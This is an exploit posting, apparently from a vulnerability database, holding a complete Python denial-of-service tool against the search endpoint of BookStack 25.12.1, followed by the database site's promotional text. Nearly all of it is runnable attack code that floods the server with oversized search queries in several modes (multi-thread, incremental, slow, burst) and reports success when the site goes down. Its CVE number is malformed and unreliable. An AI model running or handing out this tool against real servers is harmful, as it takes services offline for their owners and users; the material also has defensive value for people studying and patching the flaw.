==================================================================================================================================
| # Title : BookStack 25.12.1 Denial of Service via Search Term Resource Exhaustion |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.bookstackapp.com |
==================================================================================================================================
[+] Summary : This script a denial of service condition against a BookStack search endpoint by generating extremely large search queries and sending them with high levels of concurrency.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import argparse
import threading
import urllib3
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BookStackDoS:
def __init__(self, target_url, cookie=None, verbose=False):
self.base_url = target_url.rstrip('/')
self.cookie = cookie
self.verbose = verbose
self.search_url = f"{self.base_url}/search"
self.stop_attack = threading.Event()
self.session = requests.Session()
if cookie:
self.session.headers['Cookie'] = cookie
self.request_count = 0
self.error_count = 0
self.lock = threading.Lock()
def log(self, msg, level="INFO"):
timestamp = datetime.now().strftime("%H:%M:%S")
if level == "SUCCESS":
print(f"\033[92m[{timestamp}] [+] {msg}\033[0m")
elif level == "ERROR":
print(f"\033[91m[{timestamp}] [-] {msg}\033[0m")
elif level == "WARNING":
print(f"\033[93m[{timestamp}] [!] {msg}\033[0m")
elif level == "DEBUG" and self.verbose:
print(f"\033[94m[{timestamp}] [*] {msg}\033[0m")
else:
print(f"\033[96m[{timestamp}] [*] {msg}\033[0m")
def generate_search_payload(self, generic_terms=100, exact_terms=50, tag_terms=30):
"""Generate massive search payload to exhaust database"""
generic = [f"t{i}" for i in range(generic_terms)]
exact = [f"\"e{i}\"" for i in range(exact_terms)]
tags = [f"[t{i}=v{i}]" for i in range(tag_terms)]
all_terms = generic + exact + tags
return " ".join(all_terms)
def generate_max_payload(self):
"""Generate maximum size payload (most destructive)"""
return self.generate_search_payload(200, 100, 50)
def generate_moderate_payload(self):
"""Generate moderate payload (80% of max)"""
return self.generate_search_payload(100, 50, 30)
def generate_light_payload(self):
"""Generate light payload for testing"""
return self.generate_search_payload(30, 15, 10)
def get_search_term_count(self, payload):
"""Count number of search terms in payload"""
return len(payload.split())
def check_service_status(self):
"""Check if BookStack service is responding"""
try:
response = self.session.get(self.base_url, timeout=5)
return response.status_code == 200
except:
return False
def send_search_request(self, payload, timeout=30):
"""Send a single search request with the payload"""
encoded_payload = quote(payload)
url = f"{self.search_url}?term={encoded_payload}"
try:
response = self.session.get(url, timeout=timeout)
with self.lock:
self.request_count += 1
if self.verbose:
self.log(f"Request completed: HTTP {response.status_code}", "DEBUG")
return response
except requests.exceptions.Timeout:
with self.lock:
self.error_count += 1
self.log(f"Request timeout", "DEBUG")
return None
except Exception as e:
with self.lock:
self.error_count += 1
self.log(f"Request error: {e}", "DEBUG")
return None
def single_request_attack(self, payload_size="max"):
"""Simple single request attack"""
if payload_size == "max":
payload = self.generate_max_payload()
elif payload_size == "moderate":
payload = self.generate_moderate_payload()
else:
payload = self.generate_light_payload()
term_count = self.get_search_term_count(payload)
self.log(f"Sending single search request with {term_count} terms", "WARNING")
self.log(f"Payload preview: {payload[:200]}...", "DEBUG")
url_length = len(self.search_url) + len(payload) + 10
self.log(f"Request URL length: {url_length} bytes")
start_time = time.time()
response = self.send_search_request(payload, timeout=60)
elapsed = time.time() - start_time
if response:
self.log(f"Request completed in {elapsed:.2f}s with HTTP {response.status_code}")
else:
self.log(f"Request failed or timed out after {elapsed:.2f}s")
def multi_thread_attack(self, threads=150, duration=30, payload_size="moderate"):
"""Multi-threaded attack to exhaust resources"""
if payload_size == "max":
payload = self.generate_max_payload()
else:
payload = self.generate_moderate_payload()
term_count = self.get_search_term_count(payload)
self.log(f"Starting multi-thread attack with {threads} threads for {duration}s")
self.log(f"Each request contains {term_count} search terms")
self.request_count = 0
self.error_count = 0
self.stop_attack.clear()
def worker():
while not self.stop_attack.is_set():
self.send_search_request(payload, timeout=30)
time.sleep(0.01)
workers = []
for _ in range(threads):
t = threading.Thread(target=worker, daemon=True)
t.start()
workers.append(t)
start_time = time.time()
last_healthy_check = time.time()
service_crashed = False
while time.time() - start_time < duration:
time.sleep(2)
elapsed = int(time.time() - start_time)
if time.time() - last_healthy_check >= 5:
if self.check_service_status():
self.log(f"[{elapsed}s] Service ONLINE - Requests: {self.request_count}, Errors: {self.error_count}")
else:
self.log(f"[{elapsed}s] Service OFFLINE! - DOS Successful!", "SUCCESS")
service_crashed = True
break
last_healthy_check = time.time()
else:
self.log(f"[{elapsed}s] Attack ongoing - {self.request_count} requests sent", "INFO")
self.stop_attack.set()
for t in workers:
t.join(timeout=2)
self.log(f"Attack completed: {self.request_count} requests, {self.error_count} errors")
time.sleep(5)
if self.check_service_status():
if service_crashed:
self.log("Service recovered after attack", "WARNING")
else:
self.log("Service remained online throughout attack", "ERROR")
else:
self.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
def incremental_attack(self, start_threads=10, max_threads=200, increment=20, duration_per_phase=10):
"""Gradually increase attack intensity to find threshold"""
self.log("Starting incremental attack to find DoS threshold")
self.log(f"Threads: {start_threads} -> {max_threads} (increment: {increment})")
for threads in range(start_threads, max_threads + 1, increment):
self.log(f"\n--- Phase: {threads} threads ---")
payload = self.generate_moderate_payload()
self.request_count = 0
self.error_count = 0
self.stop_attack.clear()
workers = []
for _ in range(threads):
t = threading.Thread(
target=self.send_search_request,
args=(payload,),
daemon=True
)
t.start()
workers.append(t)
start_time = time.time()
crashed = False
while time.time() - start_time < duration_per_phase:
time.sleep(1)
if not self.check_service_status():
self.log(f"Service crashed at {threads} threads!", "SUCCESS")
crashed = True
break
self.stop_attack.set()
for t in workers:
t.join(timeout=1)
if crashed:
self.log(f"DoS threshold found: {threads} threads")
break
else:
self.log(f"Service survived {threads} threads")
time.sleep(5)
def slow_loris_attack(self, duration=60, interval=0.5):
"""Slow attack that gradually exhausts resources"""
self.log(f"Starting Slow Loris style attack for {duration} seconds")
payload = self.generate_moderate_payload()
start_time = time.time()
request_count = 0
while time.time() - start_time < duration:
# Send request with delay
self.send_search_request(payload, timeout=10)
request_count += 1
if request_count % 10 == 0:
self.log(f"Sent {request_count} slow requests")
if not self.check_service_status():
self.log("Service crashed during slow attack!", "SUCCESS")
break
time.sleep(interval)
self.log(f"Slow attack completed: {request_count} requests")
def massive_burst_attack(self, burst_size=500):
"""Send massive burst of simultaneous requests"""
self.log(f"Starting massive burst attack with {burst_size} simultaneous requests")
payload = self.generate_moderate_payload()
with ThreadPoolExecutor(max_workers=burst_size) as executor:
futures = [executor.submit(self.send_search_request, payload) for _ in range(burst_size)]
completed = 0
for future in as_completed(futures):
completed += 1
if completed % 50 == 0:
self.log(f"Completed {completed}/{burst_size} requests")
self.log(f"Burst completed: {self.request_count} successful, {self.error_count} errors")
time.sleep(3)
if self.check_service_status():
self.log("Service survived burst attack", "WARNING")
else:
self.log("Service crashed from burst attack!", "SUCCESS")
def banner():
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β BookStack 25.12.1 - Denial of Service (Search Term Exhaustion) β
β Resource Exhaustion via Massive Search Queries β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
def main():
parser = argparse.ArgumentParser(
description="CVE-1970573 - BookStack DoS via Search Term Resource Exhaustion"
)
parser.add_argument("-u", "--url", required=True, help="Target BookStack URL")
parser.add_argument("-c", "--cookie", help="Cookie for authenticated requests")
parser.add_argument("-t", "--threads", type=int, default=150, help="Number of threads (default: 150)")
parser.add_argument("-d", "--duration", type=int, default=30, help="Attack duration in seconds (default: 30)")
parser.add_argument("-m", "--mode", choices=["single", "multi", "incremental", "slow", "burst"],
default="multi", help="Attack mode (default: multi)")
parser.add_argument("-p", "--payload", choices=["light", "moderate", "max"],
default="moderate", help="Payload size (default: moderate)")
parser.add_argument("--monitor", action="store_true", help="Monitor service status only")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
args = parser.parse_args()
banner()
exploit = BookStackDoS(args.url, args.cookie, args.verbose)
if args.monitor:
exploit.log("Monitoring service status...")
while True:
if exploit.check_service_status():
exploit.log("Service ONLINE")
else:
exploit.log("Service OFFLINE", "ERROR")
time.sleep(5)
return
if not exploit.check_service_status():
exploit.log("Service is not responding. Check URL and network.", "ERROR")
return
exploit.log(f"Target: {args.url}")
exploit.log(f"Service is ONLINE, starting attack...")
if args.mode == "single":
exploit.single_request_attack(args.payload)
elif args.mode == "multi":
threads = args.threads
duration = args.duration
exploit.multi_thread_attack(threads, duration, args.payload)
elif args.mode == "incremental":
exploit.incremental_attack()
elif args.mode == "slow":
exploit.slow_loris_attack(args.duration)
elif args.mode == "burst":
exploit.massive_burst_attack(args.threads)
time.sleep(5)
if exploit.check_service_status():
exploit.log("Service still responding after attack", "WARNING")
else:
exploit.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Interrupted by user")
sys.exit(0)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation